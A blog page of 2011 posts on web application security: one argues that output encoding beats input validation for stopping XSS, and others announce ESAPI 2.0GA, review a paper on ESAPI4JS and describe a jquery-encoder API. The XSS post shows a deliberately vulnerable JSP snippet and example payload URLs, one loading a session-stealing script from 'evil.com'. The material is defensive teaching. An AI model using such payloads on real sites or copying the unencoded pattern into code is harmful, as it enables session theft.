Pages

9.08.2011

XSS - Validation vs. Encoding

I seem to have sparked another one of those lively internet conversations that I tend to spark from time to time. This time, the topic of debate was on mitigating XSS. I posted a response to a series of articles that I have read lately that either imply or blatantly state that Input Validation is the proper way to mitigate XSS. I whole-heartedly disagree with this assertion.

What is Cross-Site Scripting
Personally, I have always thought this is a horrible name for this vulnerability. The attack is performed by exploiting a vulnerability local to the codebase of the application. The Cross-Site part of XSS is really about the impact of the vulnerability rather than the vulnerability itself. An attacker can leverage weak security on a vulnerable site to include a payload hosted on another site.

That being said; XSS can be defined as a vulnerability that occurs when an attacker is able to break out of a data context and execute arbitrary code using crafted data. More simply put, XSS is nothing more than a buzz-word for a specific type of Command Injection vulnerability. Let's examine:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${request.getParameter("q")} returned '${results.size}' results
</div>

What could go wrong here?

http://my.server.com/search.jsp?q=<script>alert(document.cookie)</script>
http://my.server.com/search.jsp?q=<script src="http://evil.com/steal-session.js"></script>

These are some very naive attacks that can work. Also, notice - I have also illustrated the Cross-Site part of the Cross-Site Scripting vulnerability in my second example. This is a cross-site payload to a command injection vulnerability as the vulnerability is not the cross-site part of it at all, in fact; the script tag acts exactly as it is specified to.

Data vs Execution Context
This is a subject that has been covered a hundred million times before by people a lot smarter than me, so I will provide a brief summary on what this means in the context of XSS:

Legend: Execution Environment Data

HTML Context:
<command parameter="data" parameter="data">data<ommand>

Javascript Context:
command("data");
var var_name="data";

Style Context:
selector {
   attr: data;
   attr: command(data);
}

Highly Dilluted Context:
<command style="attr: command(data)" onclick="command('data')" param="data">data<command>

Now that we have that covered, let's move into each exhibit one by one.


Exhibit A: Standard Run-Of-The-Mill XSS
This is your mommy and daddy's XSS vector. The most common type of XSS there is on the web today and coincidentally the easiest to mitigate. This is the Reflective XSS that was not only the grand-daddy of all other XSS vectors but is still the most prevalent type of XSS issue that I find in the wild. This type of XSS is also illustrated perfectly in the above example.

By accepting untrusted input that can be modified by the end-user and rendering that input directly to the view we have created our vulnerability. An attacker can break out of the data context simply by embedding a command in the data being submitted.

While it is possible that a strict alpha-numeric whitelist validation approach could effectively mitigate the illustrated payloads; this is often not acceptable. I used the search results page as an example here for 2 specific reasons.

1) Search Results Pages are were most of these issues exist.
2) Search Engines have their own parsing engines and data vs. context rules.

If the whitelist is too strict, I won't be able to perform quality searches such as

q=mfg:"Audi"+model:"A4"+year:>2010+price:<25000


Validation simply doesn't work in this case - yes, input validation should still happen here prior to forwarding this untrusted data to a back-end service such as Solr however when rendering on the view you want this to be encoded in the correct context:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${encodeForHTML(request.getParameter("q"))} returned '${results.size}' results
</div>

When the untrusted data gets rendered now, it becomes:

"Your search for mfg:"Audi" model:"A4" year:&gt;2010 price:&lt;25000"

Additionally, an attempted attack from above becomes:

"Your search for &lt;script&gt;alert(document.cookie);&lt;/script&gt;"


Exhibit B: Persistent XSS
Persistent XSS really isn't any different than reflective when it comes to mitigation. The primary difference between Reflective and Persistent XSS is that reflective XSS relies on crafting links or otherwise tricking a victim into submitting the payload to the application whereas persistent XSS has no such limitations. A victim only needs to visit a page that has previously been exploited and the application delivers the payload to the victim without any additional interaction from the attacker. This is an important distinction in the way the attacks are executed, however they are mitigated the same way, by using Output Encoding.

Exhibit C: DOM-Based XSS
DOM Based XSS is a really interesting vector both from the attack and mitigate perspectives. What makes DOM Based XSS so unique is that it all happens in the browser. The details of what DOM-XSS actually is are discussed ad-nauseum here and here so I will refrain from trying to explain the details of it here. But if we examine the DOM-XSS Prevention Cheatsheet (which I contributed to at the OWASP Summit 2011 in Lisbon) you will see that once again, Output Encoding is the clear answer to solving this problem. The difference here being that when dealing with DOM-XSS you are encoding with Javascript as opposed to using Server-Side encoding.

Exhibit D: Edge Cases and Uncommon Vectors
In the conversation, a couple of edge cases were brought up. The first one was in dealing with File Uploads. I have to assume that the vector in question was related to this Ha.ckers.org Post. If that is indeed the case, then there are a few ways to address the problem. Output Encoding will still absolutely solve the issue, as the image filename is rendered to the view, the filename - having been provided from an untrusted source initially (end-user) should be encoded as an html attribute value in the src attribute of the img tag. While I would suggest doing that anyhow, the correct mitigation here is to rename a file rather than using the filename supplied in the post headers when writing it to disk.

The second edge case to be brought up was json parsing. This vector is a DOM-XSS vector, but is really neither about encoding or validation. The problem occurs when someone uses eval to parse a json data payload rather than using the new json_parse() function that is supplied in all modern browsers and is back-ported for non-modern browsers.

The last and final vector that was discussed was untrusted javascript and/or jsonp. Untrusted javascript and jsonp should never be executed in the scope of the document. This is also neither a validation or encoding issue, as neither are an XSS issue. These vectors are all about trust, and untrusted code should never be executed in the same scope or context as trusted code. The correct way to mitigate data-theft via untrusted script inclusion or jsonp is to execute that code in a sandbox or closure. In a sandbox or closure you can limit the scope of the execution context using a whitelist approach. Gareth Heyes has created some great sandboxing implementations to help combat against these attack vectors as OWASP Projects

Closing Statements
While I could (and maybe should) go into greater detail in each one of these areas, my main point with this post was to express that while Input Validation is a good idea for many many reasons, it is not the answer to solve one of the most prevalent bugs on the interwebz. Output Encoding remains the best practice for mitigating these attacks and by claiming otherwise we are doing a disservice to developers that really want to write more secure code. 

Update 1:
James Jardine has posted an excellent follow-up to this post on his blog over at  http://www.jardinesoftware.net/2011/09/09/xss-validation-vs-encoding/

5.11.2011

ESAPI 2.0GA IS RELEASED!

Friends, Romans, Countrymen - Lend me your ears!

It is my pleasure to announce the official release of ESAPI 2.0GA!

This release features some key enhancements over ESAPI 1.4.x including, 
but not limited to:

     * Upgrade baseline to use Java5
     * Completely redesigned and rewrote Encryptor
     * New and Improved Validation and Encoding Methods
     * Complete redesign of the ESAPI Locator and ObjectFactory
     * More unit tests
     * ESAPI Jar is now Signed with an OWASP Code Signing Certificate
     * ESAPI Jar is Sealed
     * And much, much more

We understand that a lot of you have been waiting a very long time for 
this, and so have we! It was important that we take our time with this 
release to make sure we had addressed everything possible prior to it 
going out. Included in that process was:

     * Peer review of the ESAPI Codebase
     * Code and Architecture Review of new Encryption
     * Adding and fixing unit tests
     * Tons of discussion and interaction with the OWASP Community and 
ESAPI Users

Without the feedback from our users, we could have never accomplished 
some of the awesome enhancements that have been made to the library 
since the last major release, so we owe you all a debt of gratitude for 
helping us design and implement controls that will ultimately help you 
write more secure applications.

We are currently in the process of getting a whole new suite of 
documentation, with a focus on integration tasks and actually using 
ESAPI in real applications - look for those documents over the next 
couple monthes, as well as a whole new contribs section in our 
repository aimed at providing turnkey components and solutions to some 
of the more commonly encountered integration points for ESAPI.

You can download the full distribution of ESAPI 2.0GA from our home on 
Google Code at:
http://code.google.com/p/owasp-esapi-java/downloads/list

The latest API Docs can always be found at:
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/index.html

Within the next 24-48 hours the distribution to Maven Central should be 
updated as well and you should be able to start using 2.0GA in your 
Maven projects as soon as that happens. Maven dependency will be:

<groupId>org.owasp.esapi</groupId>
<artifactId>esapi</artifactId>
<version>2.0GA</version>


As always, we would love to hear your feedback on the release and if you 
have any questions at all, you can join the ESAPI-User Mailing List here:
https://lists.owasp.org/mailman/listinfo/esapi-user

Thanks again to the OWASP and ESAPI Community for helping us build and 
release the tools that help make the internet just a little bit more sane!

Sincerely,
The ESAPI Development and Management Teams

P.S. Please forward this along to any colleagues or distribution lists 
that may be interested.

4.18.2011

ESAPI4JS - Very good write-up by Marcus Niemietz

So late last week, I recieved the final copy of a paper written by Marcus Niemietz that takes a deep dive into the ESAPI4JS Proof of Concept I wrote over a year ago. I was quite surprised, to say the least - and a bit humbled by 20+ pages of text on the project.

It's funny, I was just thinking about digging in my heals this spring and running through this code again - clean it up, trim a bunch of fat - and possibly do some additional integration into further jQuery plugins. Seems that I am not the only one who has been thinking about this project lately and that is great news!

First and foremost - I have reposted the entire report (with the author's permission and OWASP's) over on the OWASP Site.

Marcus spends some time discussing the project and concept of the project as well as the ESAPI project as a whole first off. Ths lays the groundwork for his paper and is probably stuff that most of you (my readers) already know. He also corrects some mistakes in the installation guide (that will be reflected on the wiki as soon as time allows). In addition he also spends some time discussing the assessment criteria and specifically how they relate to this project.

Once we get passed all of that, we get into the real meat of the paper.

Section 3 focuses on improvements that could be made to the project and this is where I would like to spend most of my time in this post.

3.1.x - Retrofitting Security

Marcus calls out a point here that a mature SDL will have isolated the "risks" of the application prior to any development being done. This is generally very true for shops that have an established and mature SDL - but that statement definitely does not apply to the majority of software development shops that are writing applications for the web today. The idea of retrofitting security into an existing application is paramount to the idea behind ESAPI. It is imperative that developers have the ability to integrate ESAPI controls into existing applications because there are a lot more insecure existing applications on the internet right now then there are new applications being built. Several large shops have legacy applications that are no longer actively maintained unless there is a problem, some have such massive application portfolios that it isn't realistic to expect rewrites and large redesigns, and the majority of the applications that are live (and vulnerable) on the web today are smaller "Mom and Pop" applications. This is the target market for ESAPI!

3.2.x - Modification of Objects


I heartily agree this is a huge issue - and one that I have passionately spoken out about whenever the opportunity arises. The fact of the matter is that until Javascript accepts the fact that some objects just *need* to be immutable, security will always be just another stepping stone for the attacker to (easily) overcome in the browser. In specific Marcus refers to the ability to overwrite objects in the DOM by referencing HTML Elements with the same id in Internet Explorer. While this is indeed a problem, the issue is much larger and depends 100% on the forced implementation of Immutable Objects in ALL browsers as described in the ECMAScript 5 Specification

3.3.x - Redundancy


This is a tricky issue in some regards, while most of this is due to the fact that I was simply creating a proof of concept that this could be done in Javascript - I also am a firm believer that all implementations of the ESAPI (regardless of language) should follow a well defined API specification. Because of this, it is to be expected that there will be some redundancy in some languages - some methods that perhaps just don't make sense in the language (such as the illustrated escape/unescape methods) will be implemented anyhow just to enforce the contract (implied in JS of course) of the API.

Adding more Validation!


I  agree with this to a certain extent - I think that all the suggested validators should be "available", but there is no need for my user registration form on my small used book store to require validation of International Bank Account Numbers - it does however make sense to provide ISBN validation. This problem (I believe anyhow) is addressed very well in the jQuery Plugin architecture and I would ultimately like to see this same type of architecture implemented into future ESAPI4JS implementations.

Summary


All in all, I think Marcus did a great job researching and presenting his case in this paper, and I highly recommend that everyone give it a read and comment. I look forward to reading your comments and rebuttals  - this is how we change the world people. One small debate at a time. :)

3.07.2011

New Encoding - Property Aware Contextual Encoding

After some conversations over Twitter with the the XSS Ninja known as Gareth Heyes regarding different escaping needs that went even further than just having the context itself. Basically, the gist of the conversation asserted that different escaping rules applied to different CSS properties, for instance the background-color property accepts Hexadecimal color codes (#CCCCCC) or rgb color (rgb(100,100,100)) formulas as well as plain-text well-known color keywords (blue) - this is drastically different than what would go into something like say the width property - which would simply be a fixed size or percentage. It was at this point that we came to the conclusion that jquery-encoder should use the property name that is being encoded for to determine the correct escaping syntax.

The new API for the property aware encodeForXXX methods follows

  • encodeForCss(property,data,omitPropertyName)
    Returns the encoded property: value pair, escaped in the context of the passed in property. Banned properties are the behavior family (behavior,-moz-behavior,-ms-behavior) as they are not safe to be set using untrusted data and allow for script injection by definition. Values that contain the expression keyword will also be rejected as unsafe, as this is the equivelent of calling the javascript eval within a style context. If the optional omitPropertyName is true the function will return only the value encoded for the passed in property.
  • encodeForHTMLAttribute(attribute,data,omitAttributeName)
    Returns the encoded attribute="value" pair, escaped in the context of the passed in attribute. Banned attributes are href and src as those should be encoded using the encodeForUrl function. The javascript event hooks on* are also banned as they should be set using the encodeForJavascript function. The style attribute should be set using the encodeForCSS function. If the optional omitAttributeName parameter is true, the function will return only the value encoded for the passed in attribute.

In all cases, the property/attribute names are canonicalized prior to encoding to validate and get the escaping context for that property (or the default if there is no specific context specified)

This was a somewhat difficult decision to make, simply because it is mixing in a bit of validation with the output encoding control - which is not necessarily ideal from a pure design standpoint. I felt however, that this was a necessary evil in order to ensure correct encoding/escaping context and get the most value from the plugin.

Please continue to send me your thoughts and ideas for the plugin - I plan on releasing it to the general public through the jQuery plugin repository within the next couple weeks so any feedback from the community leading up to the release of the plugin will only make it stronger!

As always, the latest version of the plugin is available from my github
https://github.com/chrisisbeef/jquery-encoder

The sandbox (which will be updated with the latest version today) is available on my site:
http://software.digital-ritual.net/jqencoder/